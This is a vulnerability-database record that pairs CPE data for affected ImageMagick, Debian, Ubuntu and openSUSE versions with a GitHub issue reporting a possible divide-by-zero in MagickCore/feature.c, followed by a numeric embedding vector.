[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "26AC6455-68F9-418E-B71A-3E9A35155603", "versionEndExcluding": "6.9.10-41", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "349C9D88-CD50-4928-B492-1CF880BA00F6", "versionEndExcluding": "7.0.8-41", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1552
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
MagickCore/feature.c In line 2259, it assgin 'count=0', the code make a loop as 'for (v=(-((ssize_t) height/2)); v <= (((ssize_t) height/2)); v++)' , the 'count++' in this loop and the 'gamma=1.0/count' in line 2291. But the count is 0 in some cases. It may happen DIVIDE_BY_ZERO bug if the code don't get in this loop.
DIVIDE_BY_ZERO in feature.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1552/comments
2
2019-04-18T06:16:56
2019-08-18T16:30:47Z
https://github.com/ImageMagick/ImageMagick/issues/1552
434,607,141
1,552
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : DIVIDE_BY_ZERO in feature.c Issue date: --- start body --- MagickCore/feature.c In line 2259, it assgin 'count=0', the code make a loop as 'for (v=(-((ssize_t) height/2)); v <= (((ssize_t) height/2)); v++)' , the 'count++' in this loop and the 'gamma=1.0/count' in line 2291. But the count is 0 in some cases. It may happen DIVIDE_BY_ZERO bug if the code don't get in this loop. --- end body ---
472
[ -0.015024752356112003, -0.0031039705500006676, -0.011487796902656555, 0.014673979952931404, 0.04811428487300873, 0.013870126567780972, 0.0003215413889847696, 0.058491300791502, -0.019453253597021103, 0.036451101303100586, -0.018547091633081436, 0.03206644579768181, 0.009229699149727821, 0.0005448847659863532, -0.0020242491737008095, 0.016164762899279594, -0.02529946155846119, -0.002597908256575465, -0.008060458116233349, -0.020768649876117706, -0.004362732172012329, -0.015141676180064678, -0.03212490677833557, 0.06056670472025871, -0.035661861300468445, 0.017450928688049316, -0.03154028579592705, -0.007994688116014004, 0.012591268867254257, -0.02337021194398403, 0.02566484920680523, 0.023750215768814087, 0.0020644417963922024, -0.014980905689299107, 0.014096667058765888, -0.007585453800857067, 0.03779572993516922, 0.06781600415706635, 0.012379343621432781, 0.009799704886972904, -0.048552751541137695, -0.02867564558982849, -0.024948688223958015, 0.012445113621652126, -0.00807507336139679, -0.019277866929769516, 0.0018981903558596969, -0.01651553437113762, -0.035983406007289886, -0.008659694343805313, 0.018839402124285698, -0.028894878923892975, 0.0008728204411454499, -0.0001419303735019639, -0.00518850889056921, -0.024130219593644142, 0.025913313031196594, 0.01936556026339531, -0.005053315311670303, 0.005119084846228361, -0.01955556310713291, 0.03829265758395195, -0.012152803130447865, 0.027141015976667404, -0.03589571267366409, -0.005835245363414288, -0.019190175458788872, 0.04641888290643692, -0.04144960641860962, 0.007406413555145264, -0.007439298555254936, -0.040397290140390396, 0.013563200831413269, 0.03835111856460571, 0.022420203313231468, 0.007702377624809742, 0.0425603874027729, 0.01127587165683508, -0.029567191377282143, -0.01996479742228985, -0.038994200527668, 0.035720326006412506, -0.06044978275895119, -0.0093977777287364, 0.018020933493971825, -0.021777121350169182, -0.031189514324069023, -0.07272681593894958, -0.018254781141877174, -0.0031057975720614195, -0.0022087700199335814, 0.016033222898840904, -0.0026764667127281427, -0.017392465844750404, -0.00807507336139679, -0.010676635429263115, -0.007512376178056002, 0.0038731121458113194, -0.013745894655585289, -0.025445615872740746, -0.0154193714261055, 0.010143169201910496, -0.0008070506155490875, 0.01959940977394581, -0.012518190778791904, 0.04045575112104416, 0.004121575970202684, -0.021338656544685364, 0.04682811722159386, 0.09313008189201355, -0.01853247731924057, -0.012934733182191849, -0.034434158354997635, -0.007600069046020508, 0.02467099390923977, 0.02002325840294361, 0.023019440472126007, 0.004472348373383284, -0.0032775297295302153, -0.01556552667170763, 0.004132537636905909, -0.01357781607657671, -0.040660370141267776, 0.020008644089102745, -0.014637441374361515, 0.016603227704763412, 0.006712176371365786, -0.028207948431372643, -0.025255614891648293, 0.010603558272123337, -0.002826275769621134, -0.034229543060064316, 0.015053982846438885, -0.03881881386041641, 0.038380350917577744, -0.027360249310731888, -0.032241832464933395, 0.01568244956433773, 0.0007444779039360583, 0.03390800207853317, -0.05156354606151581, -0.029552577063441277, 0.0203886479139328, 0.0008910898468457162, -0.039666514843702316, 0.010084707289934158, -0.018152473494410515, -0.019073249772191048, -0.008557385765016079, -0.014505901373922825, -0.014023588970303535, -0.02980104088783264, 0.025182537734508514, 0.001272463472560048, 0.03361568972468376, 0.004256769549101591, -0.004183691926300526, 0.01837170496582985, -0.0053894720040261745, -0.052937403321266174, -0.018824785947799683, -0.026994861662387848, 0.01986248791217804, -0.006887562572956085, -0.016793230548501015, 0.007388144265860319, -0.02072480320930481, 0.013424352742731571, -0.01787477731704712, 0.03256337344646454, 0.02705332264304161, -0.013468199409544468, 0.014206282794475555, -0.006423519924283028, -0.04095267876982689, 0.02668793499469757, 0.013066273182630539, 0.03192029148340225, 0.009587779641151428, -0.047032736241817474, -0.0340249240398407, -0.05004353076219559, -0.024948688223958015, -0.011714337393641472, 0.04440194368362427, -0.022390972822904587, 0.023750215768814087, 0.022931747138500214, 0.03335260972380638, -0.027637943625450134, 0.017056308686733246, 0.007406413555145264, 0.03653879463672638, -0.015258600004017353, 0.021543273702263832, -0.018605554476380348, -0.023224057629704475, -0.04562964662909508, -0.005521012004464865, -0.0287779550999403, 0.0056781284511089325, -0.002773294458165765, -0.01717323251068592, 0.0032610874623060226, -0.03165721148252487, 0.009785088710486889, 0.0029450268484652042, -0.002294636331498623, 0.008506231009960175, -0.03873112052679062, -0.027272555977106094, -0.027901023626327515, -0.020330185070633888, 0.028032563626766205, -0.03016642853617668, 0.01313204225152731, 0.00017881172243505716, 0.024217912927269936, 0.018649401143193245, -0.01578475907444954, 0.049985069781541824, 0.007987380027770996, -0.010523173026740551, -0.009733934886753559, -0.0129128098487854, -0.03238798677921295, 0.0054808189161121845, -0.04068960249423981, -0.03747418895363808, -0.004549080040305853, 0.015930913388729095, -0.010932407341897488, -0.005992362275719643, -0.0011482315603643656, 0.006591598503291607, -0.018181703984737396, -0.0021722312085330486, -0.03510647267103195, 0.001662515103816986, 0.015287831425666809, 0.010545096360147, 0.06828369945287704, -0.03861419856548309, -0.011392796412110329, 0.01289819460362196, 0.013307428918778896, -0.0049985069781541824, -0.008177381940186024, -0.003957151435315609, 0.009127390570938587, 0.0026636780239641666, -0.01837170496582985, 0.023428674787282944, -0.0251679215580225, 0.00704467948526144, 0.004567349329590797, 0.02914334274828434, 0.03753264993429184, -0.01178741455078125, -0.004008305724710226, 0.03113105334341526, 0.018254781141877174, -0.030224891379475594, 0.017319388687610626, 0.01707092486321926, -0.013563200831413269, -0.058198992162942886, 0.01208703313022852, -0.014352438040077686, -0.0019219405949115753, 0.020476339384913445, -0.044080402702093124, -0.0047610048204660416, -0.011875107884407043, -0.005111777223646641, 0.005773129407316446, 0.006196979433298111, 0.021601734682917595, 0.02579638920724392, 0.01667630486190319, 0.004687927197664976, 0.024787917733192444, 0.0017721315380185843, 0.01790400967001915, 0.010479326359927654, -0.02046172507107258, 0.013336660340428352, -0.004048498347401619, -0.030721819028258324, -0.05700051784515381, -0.015726296231150627, 0.0010450094705447555, -0.022303279489278793, -0.007760840002447367, 0.019716333597898483, -0.00844046100974083, -0.0058754379861056805, -0.03186182677745819, -0.01191895455121994, -0.006434481590986252, -0.012481652200222015, -0.03010796569287777, 0.02553330920636654, -0.005754860118031502, -0.013219735585153103, -0.002194154541939497, -0.005440626293420792, 0.00044760023592971265, 0.004976583644747734, -0.022785592824220657, 0.027725636959075928, -0.043320395052433014, 0.028529491275548935, -0.0224494356662035, -0.02619100734591484, -0.003379838541150093, 0.01475436519831419, -0.026307931169867516, 0.02347252145409584, -0.022127894684672356, -0.021572504192590714, 0.0009755858336575329, 0.005795052740722895, 0.018883248791098595, 0.027141015976667404, -0.00005669222446158528, -0.021090192720294, 0.04194653406739235, -0.055246658623218536, 0.018152473494410515, 0.015828605741262436, -0.03557417169213295, 0.011166255921125412, -0.02937719039618969, 0.0021283847745507956, -0.04106960445642471, 0.005670820828527212, 0.018094010651111603, 0.020403262227773666, 0.0017995355883613229, 0.003378011519089341, 0.002491945866495371, 0.01905863545835018, -0.030283352360129356, -0.0029523344710469246, -0.030692586675286293, -0.00595947727560997, -0.017962470650672913, -0.0038402273785322905, 0.0061239018104970455, 0.000828973890747875, 0.05729283019900322, -0.03835111856460571, 0.02072480320930481, 0.003986382391303778, -0.002683774335309863, 0.009163929149508476, -0.014725133776664734, 0.027228709310293198, -0.02757948264479637, 0.00007895805174484849, -0.04592195525765419, 0.013205120339989662, -0.01693938486278057, -0.01178741455078125, 0.020929422229528427, 0.013300120830535889, -0.05042353644967079, -0.008557385765016079, -0.01657399721443653, -0.046506576240062714, 0.03729880228638649, -0.0313064381480217, 0.039374206215143204, -0.03414184972643852, -0.003314068540930748, 0.018444783985614777, -0.013702047988772392, -0.007483145222067833, 0.01837170496582985, -0.02888026274740696, 0.029216419905424118, 0.013256274163722992, -0.05510050058364868, 0.03832188621163368, 0.0049436986446380615, -0.011005484499037266, 0.029421037063002586, -0.0027075246907770634, -0.008045842871069908, -0.03481416404247284, 0.02098788321018219, -0.02937719039618969, -0.04402193799614906, 0.011670490726828575, 0.04896198585629463, -0.012773962691426277, -0.03732803091406822, 0.023764831945300102, -0.024685610085725784, 0.045045025646686554, -0.028237180784344673, 0.016427841037511826, 0.022493282333016396, -0.00988009013235569, 0.022858669981360435, -0.015697065740823746, -0.0066244835034012794, 0.013329352252185345, -0.03235875442624092, 0.005557550583034754, -0.015799375250935555, -0.0022781938314437866, 0.005590435583144426, 0.05901746079325676, -0.002692909212782979, -0.004728119820356369, 0.023092517629265785, -0.06682214885950089, 0.030575662851333618, 0.033498767763376236, 0.009448932483792305, -0.01892709545791149, 0.008842388167977333, -0.0035533977206796408, -0.0035734940320253372, 0.010749713517725468, 0.013548584654927254, 0.02261020615696907, 0.00442484812811017, -0.031774137169122696, -0.026439471170306206, 0.012116264551877975, 0.02148481085896492, -0.0078046866692602634, -0.03648033365607262, -0.012700884602963924, -0.000057491510233376175, -0.027608713135123253, -0.0033542613964527845, -0.0022800208535045385, 0.039871133863925934, 0.0019128058338537812, -0.002638100879266858, -0.030487969517707825, -0.028821801766753197, -0.03203721344470978, -0.00361368665471673, -0.01829862780869007, -0.033440303057432175, -0.02334098145365715, 0.03408338874578476, 0.010603558272123337, -0.047617357224226, 0.01720246486365795, 0.03165721148252487, -0.02532869204878807, -0.014242822304368019, 0.05302509665489197, -0.008360075764358044, -0.023662522435188293, -0.003617340698838234, -0.022274048998951912, 0.0055356272496283054, 0.031949520111083984, 0.013438968919217587, 0.00019148612045682967, -0.00537120271474123, -0.005203124135732651, 0.0009381335694342852, -0.009514701552689075, 0.03513570502400398, 0.011341641657054424, 0.01276665460318327, -0.0044065783731639385, -0.022230202332139015, -0.012942041270434856, -0.0278864074498415, 0.023267904296517372, -0.026673320680856705, 0.011889724060893059, -0.027141015976667404, -0.04197576642036438, -0.006112940143793821, 0.015638604760169983, 0.004720812197774649, 0.04142037779092789, -0.01873709447681904, -0.029421037063002586, 0.01339512225240469, 0.01634014956653118, 0.026629474014043808, -0.003169740317389369, -0.03183259814977646, 0.015872452408075333, -0.014264745637774467, -0.032446447759866714, -0.00976316537708044, 0.03390800207853317, 0.004044844303280115, 0.012430497445166111, -0.01670553721487522, 0.01853247731924057, 0.014191667549312115, 0.002689255168661475, -0.02937719039618969, -0.03317722678184509, -0.008191998116672039, -0.03306030109524727, -0.025781773030757904, -0.0070008328184485435, -0.020315568894147873, -0.02410098910331726, -0.07214219868183136, -0.02341405861079693, -0.005236009135842323, 0.024919457733631134, -0.019438639283180237, 0.00893738865852356, 0.0007230113842524588, -0.013526661321520805, -0.007943534292280674, 0.030283352360129356, 0.04694504290819168, 0.020447108894586563, 0.024247143417596817, -0.012693577446043491, 0.012357420288026333, -0.0060179391875863075, -0.005173893179744482, 0.007428336888551712, 0.005838899407535791, 0.008418538607656956, 0.03165721148252487, -0.017450928688049316, 0.022332511842250824, -0.0036483986768871546, 0.0036447446327656507, 0.01286165602505207, -0.007651223335415125, -0.023326367139816284, 0.03686033561825752, -0.035223398357629776, 0.004896198399364948, -0.027199478819966316, 0.021134039387106895, -0.006339480634778738, 0.02234712615609169, -0.00451619504019618, -0.02360406145453453, 0.018342474475502968, -0.017787085846066475, 0.011319718323647976, 0.00263992790132761, 0.010735097341239452, 0.0067523689940571785, -0.0027458902914077044, -0.029625654220581055, 0.0511835440993309, 0.012079725041985512, 0.020564032718539238, 0.011524335481226444, 0.03589571267366409, 0.03586648032069206, -0.008111611939966679, -0.01942402310669422, -0.02605946734547615, 0.015200138092041016, -0.03802957758307457, -0.018313243985176086, -0.0017182368319481611, -0.014184359461069107, 0.029698731377720833, -0.003997344058007002, -0.0027751214802265167, 0.008228536695241928, -0.00340724247507751, -0.0009701050003059208, -0.01105663925409317, -0.004271385259926319, 0.013000503182411194, -0.017085541039705276, 0.007811994291841984, 0.028500258922576904, 0.005144662223756313, -0.04378809034824371, 0.015229369513690472, -0.01565321907401085, 0.012627807445824146, -0.01226972695440054, -0.0038840738125145435, 0.04709119722247124, -0.0010413556592538953, -0.001368377823382616, 0.01837170496582985, 0.01617937721312046, -0.010998177342116833, 0.03773726522922516, 0.01955556310713291, -0.0201547984033823, -0.024159450083971024, 0.007556222844868898, -0.016003992408514023, -0.027637943625450134, -0.030984897166490555, 0.029727963730692863, 0.001019432325847447, -0.01654476672410965, 0.011875107884407043, 0.02937719039618969, 0.014352438040077686, 0.036655716598033905, 0.049020446836948395, -0.01683707721531391, -0.008133535273373127, 0.026834091171622276, -0.0034456083085387945, 0.025547925382852554, -0.00785584095865488, -0.013767817988991737, 0.03960805386304855, -0.03998805582523346, -0.005659859161823988, 0.020812496542930603, -0.003365222830325365, 0.007435644511133432, -0.023253288120031357, -0.004940045066177845, 0.005528319627046585, -0.03779572993516922, -0.015930913388729095, 0.015463218092918396, 0.008827772922813892, -0.021499427035450935, -0.006891216617077589, 0.013548584654927254, 0.03338184207677841, -0.004753697197884321, -0.02247866615653038, -0.029830271378159523, -0.016851691529154778, -0.000877844518981874, -0.00023247807985171676, -0.0002098697004839778, -0.027228709310293198, -0.0015812163474038243, 0.009916628710925579, 0.04372962936758995, -0.005199470557272434, 0.02274174615740776, -0.03735726326704025, 0.003171567339450121, 0.001076980959624052, 0.008096996694803238, 0.021528657525777817, -0.00772430095821619, 0.013526661321520805, 0.06179440766572952, -0.0037452264223247766, -0.022902516648173332, -0.009799704886972904, -0.01714400202035904, 0.006175056099891663, 0.002491945866495371, 0.016983231529593468, -0.010859329253435135, -0.02059326507151127, -0.017348619177937508, 0.02532869204878807, 0.0111077930778265, 0.00770968571305275, -0.016749383881688118, -0.008973928168416023, 0.006339480634778738, 0.00021968949295114726, -0.014008973725140095, 0.030575662851333618, 0.023662522435188293, -0.011809337884187698, 0.03154028579592705, 0.026439471170306206, 0.004022921435534954, -0.0024663687217980623, 0.007271219976246357, -0.040631137788295746, -0.007110449485480785, -0.0041727302595973015, -0.005177547223865986, -0.011612028814852238, -0.011802030727267265, 0.014206282794475555, 0.0025723311118781567, -0.0007458481122739613, -0.007600069046020508, -0.003272049129009247, 0.016369380056858063, 0.005382164381444454, 0.027404095977544785, -0.03425877168774605, 0.00785584095865488, -0.033206455409526825, -0.006467366591095924, 0.02373560145497322, 0.002148481085896492, -0.0398419015109539, 0.018810171633958817, -0.01011393778026104, 0.01939479261636734, -0.02953796088695526, -0.023764831945300102, -0.020695572718977928, 0.022697899490594864, -0.034989550709724426, -0.006270057056099176, 0.012306265532970428, -0.02984488755464554, -0.013300120830535889, 0.007355259265750647, -0.05466203764081001, 0.005159277934581041, -0.024992534890770912, -0.01910248212516308, -0.04244346171617508, -0.04022190347313881, 0.021791737526655197, -0.015331678092479706, 0.030078735202550888, 0.007238334976136684, 0.020213261246681213, 0.00920046865940094, -0.01902940310537815, -0.016427841037511826, 0.015989376232028008, 0.011158947832882404, -0.006507559213787317, -0.001170154893770814, 0.016997847706079483, 0.015243984758853912, 0.027564866468310356, -0.013526661321520805, 0.005089853890240192, 0.011546258814632893, -0.0006905831978656352, -0.029216419905424118, 0.0008280604379251599, -0.032943375408649445, -0.00042247981764376163, 0.02950873039662838, -0.009266238659620285, 0.02540176920592785, 0.012920117937028408, 0.020768649876117706, 0.02354559861123562, -0.03975420817732811, -0.005513703916221857, 0.010165092535316944, -0.00214665406383574, -0.021777121350169182, 0.021835584193468094, 0.007300450932234526, -0.0041873459704220295, -0.00790699478238821, -0.008140843361616135, 0.020213261246681213, 0.029932580888271332, 0.01978941075503826, 0.01707092486321926, 0.006847369950264692, 0.020812496542930603, 0.011911646462976933, 0.016851691529154778, -0.0010870291152969003, -0.02493407391011715, 0.0013345794286578894, -0.01254742220044136, -0.030926436185836792, -0.008096996694803238, -0.008652386255562305, 0.032943375408649445, 0.020271722227334976, -0.00817007478326559, 0.013497430831193924, -0.013753201812505722, 0.038409579545259476, 0.0287779550999403, -0.009909320622682571, 0.003715995466336608, 0.005557550583034754, -0.0005978660192340612, 0.016252456232905388, -0.014637441374361515, -0.022668667137622833, 0.01571168191730976, -0.013292813673615456, -0.006726792082190514, -0.028602568432688713, -0.004165422637015581, 0.005488127004355192, 0.0024005987215787172, -0.014980905689299107, 0.014264745637774467, 0.020666342228651047, -0.03314799442887306, -0.023150980472564697, -0.029216419905424118, -0.014812827110290527, -0.03583724796772003, -0.009675472974777222, -0.03212490677833557, 0.019497100263834, 0.02323867380619049, -0.016427841037511826, 0.004128883592784405, -0.00420196121558547, 0.014863981865346432, 0.01236472837626934, 0.00890085007995367, -0.022624820470809937, -0.005144662223756313, 0.016267070546746254, -0.02532869204878807, 0.016997847706079483, -0.013533969409763813, -0.045308105647563934, -0.017889393493533134, -0.018313243985176086, 0.0002939089317806065, -0.010961637832224369, 0.014980905689299107, 0.0037744573783129454, 0.010252785868942738, -0.0076439157128334045, 0.01390666514635086, 0.006178710144013166, 0.016354763880372047, 0.023253288120031357, -0.015799375250935555, 0.0014323206851258874, -0.035457246005535126, 0.021207116544246674, -0.02231789566576481, -0.0028445450589060783, -0.0033469535410404205, -0.022931747138500214, 0.02344329096376896, -0.03463877737522125, 0.005268894135951996, 0.009522009640932083, -0.0018707863055169582, -0.011268564499914646, 0.05103738605976105, 0.009090851992368698, 0.008995851501822472, 0.033206455409526825, 0.007505068555474281, -0.013870126567780972, -0.0033889731857925653, -0.03162797912955284, -0.012167418375611305, -0.02208404801785946, 0.0008212093962356448, -0.015872452408075333, 0.006281018722802401, -0.03952036052942276, 0.04320346936583519, 0.0017940547550097108, -0.003067431738600135, 0.0031898366287350655, 0.03086797334253788, -0.014834750443696976, -0.025021765381097794, -0.01704169437289238, 0.06840062141418457, 0.001617755158804357, -0.01584322191774845, -0.013643586076796055, -0.005619666539132595, 0.007475837133824825, -0.01892709545791149, -0.005754860118031502, 0.00205165334045887, 0.023092517629265785, -0.002742236480116844, 0.00857200101017952, -0.03154028579592705, -0.019307099282741547, 0.005016776267439127, -0.03724033758044243, -0.00039713102160021663, -0.0027458902914077044, 0.014725133776664734, 0.020768649876117706, -0.029128726571798325, -0.017962470650672913, 0.032709527760744095, 0.016369380056858063, 0.016778614372015, -0.002537619322538376, -0.021031729876995087, -0.021060960367321968, -0.0009481817251071334, -0.015960145741701126, 0.003423684975132346, 0.022288665175437927, 0.008294306695461273, -0.016120916232466698, 0.018678631633520126, 0.003032719949260354, -0.009061620570719242, 0.010683943517506123, 0.006573329214006662, -0.017100155353546143, -0.009280853904783726, -0.01422089897096157, -0.01910248212516308, 0.007252950686961412, -0.013687432743608952, 0.030546432361006737, 0.010347786359488964, 0.028631798923015594, -0.01683707721531391, 0.015930913388729095, -0.02838333509862423, 0.003619167488068342, 0.016325533390045166, -0.03688956797122955, -0.011268564499914646, 0.029070265591144562, 0.024451760575175285, 0.006759677082300186, 0.010340479202568531, 0.011743568815290928, 0.02898257225751877, 0.014790903776884079, 0.003091182094067335, -0.012620499357581139, -0.022654052823781967, -0.006485635880380869, -0.029216419905424118, -0.03607109934091568, 0.021996354684233665, 0.012167418375611305, 0.006281018722802401, 0.010618173517286777, 0.025211768224835396, -0.0005225047352723777, 0.021192500367760658, -0.019204789772629738, -0.00027495442191138864, -0.03107259050011635, -0.032212600111961365, 0.007344297599047422, -0.000882411899510771, -0.004410232417285442, 0.020374031737446785, 0.022800207138061523, -0.010888560675084591, 0.019248636439442635, -0.0016159281367436051, 0.03382030874490738, 0.009887397289276123, 0.0033597422298043966, 0.0052981250919401646, -0.00196396023966372, -0.01394320372492075, 0.007651223335415125, -0.01680784486234188, -0.012576652690768242, -0.039900362491607666, -0.0062298644334077835, 0.007505068555474281, 0.0009892878588289022, 0.03241721913218498, 0.01733400486409664, -0.042092692106962204, 0.02791563794016838, -0.022200971841812134, -0.03425877168774605, -0.01996479742228985, 0.00021854766237083822, -0.012890886515378952, 0.012057801708579063, 0.08026842027902603, 0.008732771500945091, 0.0047610048204660416, -0.013650893233716488, 0.0067669847048819065, 0.02394021861255169, -0.010369709692895412, 0.008528154343366623, -0.012591268867254257, 0.027462556958198547, -0.0010559711372479796, -0.05822822079062462, -0.014082050882279873, 0.02218635566532612, 0.0024809841997921467, -0.023794062435626984, -0.009821628220379353, -0.010384324938058853, -0.03700648993253708, 0.019497100263834, 0.023589445278048515, -0.03180336579680443, -0.007483145222067833, -0.004552733618766069, -0.00572928274050355, 0.03551570698618889, -0.0001295985421165824, 0.025080228224396706, -0.008528154343366623, 0.020315568894147873, 0.0271848626434803, 0.016690921038389206, 0.02702409215271473, 0.006500251591205597, -0.027199478819966316, -0.00011886526772286743, 0.030049504712224007, 0.03995882719755173, -0.010157784447073936, 0.014907827600836754, -0.033206455409526825, -0.019073249772191048, -0.006251787766814232, 0.009821628220379353, -0.02496330440044403, 0.0075927614234387875, 0.03209567815065384, 0.009047005325555801, 0.019584793597459793, -0.008447769097983837, 0.013504737988114357, -0.005754860118031502, -0.01793324016034603, -0.0280764102935791, 0.023004824295639992, -0.014703210443258286, -0.014286668971180916, 0.009953167289495468, 0.048786599189043045, -0.0054588960483670235, -0.020914806053042412, 0.003869458334520459, -0.014118590392172337, 0.0203886479139328, 0.0008394788019359112, -0.013811664655804634, 0.003080220427364111, -0.029421037063002586, -0.003858496667817235, 0.009858166798949242, 0.02480253390967846, -0.029245650395751, -0.011290487833321095, 0.006595252547413111, -0.003169740317389369, -0.013987050391733646, -0.00903239008039236, 0.0043554240837693214, 0.012788577936589718, -0.012021263130009174, 0.010318555869162083, -0.030955666676163673, -0.02247866615653038, -0.0017730449326336384, 0.0006905831978656352, 0.028164101764559746, 0.011480488814413548, 0.0032446449622511864, 0.00586082274094224, 0.020198645070195198, -0.03268029913306236, 0.00293041137047112, 0.011794722639024258, -0.016968615353107452, 0.013285505585372448, -0.011063947342336178, -0.00029139689286239445, -0.005641589872539043, 0.0013354929396882653, -0.01286165602505207, 0.012686269357800484, -0.015609373338520527, -0.02731640264391899, -0.009653549641370773, -0.002398771932348609, 0.006189671810716391, -0.0071616037748754025, 0.01730477251112461, -0.015287831425666809, -0.02964027039706707, 0.005754860118031502, -0.003847535001114011, -0.006576982792466879, -0.03209567815065384, 0.025811003521084785, 0.08424384146928787, 0.002011460717767477, -0.020184030756354332, -0.0033962808083742857, 0.006818138994276524, 0.0005919284885749221, -0.00020142010180279613, -0.003770803567022085, -0.0033542613964527845, 0.00704467948526144, 0.005502742249518633, -0.007205450441688299, -0.00205530715174973, 0.034697238355875015, 0.00681448495015502, 0.02367713861167431, 0.01109317783266306, 0.006299288012087345, 0.004154460970312357, -0.01730477251112461, 0.010888560675084591, 0.0046988888643682, -0.014893212355673313, -0.031715672463178635, 0.007519683800637722, -0.026249470189213753, -0.004307923838496208, -0.03180336579680443, -0.0294356532394886, -0.020242491737008095, 0.01221857313066721, -0.002829929580911994, -0.018488630652427673, 0.009938552044332027, 0.00003268509317422286, 0.0009120996692217886, 0.031218746677041054, 0.00014489915338344872, -0.025504078716039658, -0.012437805533409119, -0.013621662743389606, 0.003968113102018833, -0.0005910149775445461, -0.04022190347313881, -0.008710848167538643, -0.019409406930208206, 0.03703572228550911, 0.0002156930713681504, -0.014549748040735722, -0.02224481850862503, -0.02022787556052208, -0.025474848225712776, 0.02247866615653038, 0.009047005325555801, -0.00925162248313427, 0.01153895165771246, -0.008162766695022583, 0.006295634433627129, -0.014177052304148674, 0.0011062120320275426, -0.00976316537708044, -0.00013005526852793992, -0.008769311010837555, -0.01976018026471138, -0.0003473469114396721, 0.008045842871069908, -0.024188682436943054, -0.010033552534878254, -0.016749383881688118, 0.03747418895363808, 0.01143664214760065, 0.012971271760761738, -0.007877764292061329, -0.00021820511028636247, 0.017129385843873024, 0.019716333597898483, 0.006112940143793821, 0.04273577407002449, 0.020870959386229515, -0.02864641509950161, 0.014593594707548618, 0.008864311501383781, -0.003663014154881239, 0.030254121869802475, -0.019219405949115753, 0.00528716342523694, -0.03688956797122955, -0.025621002539992332, 0.0026143507566303015, -0.005663513205945492, 0.0008819551439955831, -0.0025175230111926794, 0.00976316537708044, 0.012920117937028408, 0.016763998195528984, 0.026804858818650246, 0.008338152430951595, -0.003460223786532879, -0.0075781457126140594, -0.010033552534878254, 0.009010466746985912, -0.013826279900968075, 0.04954660311341286, -0.0008814983884803951, -0.016223223879933357, -0.009375854395329952, 0.00753429951146245, 0.015521680004894733, 0.03998805582523346, 0.003558878554031253, -0.039140354841947556, -0.02752101980149746, 0.033498767763376236, -0.014213590882718563, -0.024057142436504364, 0.0022252125199884176, -0.0004393789859022945, -0.0057073598727583885, -0.00505696889013052, -0.004505233373492956, -0.003935228101909161, 0.0011792895384132862, 0.01955556310713291, 0.0022252125199884176, 0.01902940310537815, 0.028763338923454285, 0.019321713596582413, 0.005440626293420792, 0.0229171309620142, 0.003220894606783986, 0.021777121350169182, -0.005093507934361696, -0.002491945866495371, -0.004479655995965004, 0.013935896568000317, 0.0013336660340428352, 0.010355094447731972, -0.01727554202079773, -0.030487969517707825, 0.00740275951102376, -0.0129128098487854, 0.024261759594082832, 0.015346293337643147, 0.007333335932344198, 0.00044691513176076114, 0.004702542908489704, 0.023501751944422722, 0.008433153852820396, 0.01905863545835018, 0.022157125174999237, 0.0033962808083742857, -0.015857836231589317, -0.0020717496518045664, 0.048991214483976364, -0.011517028324306011, 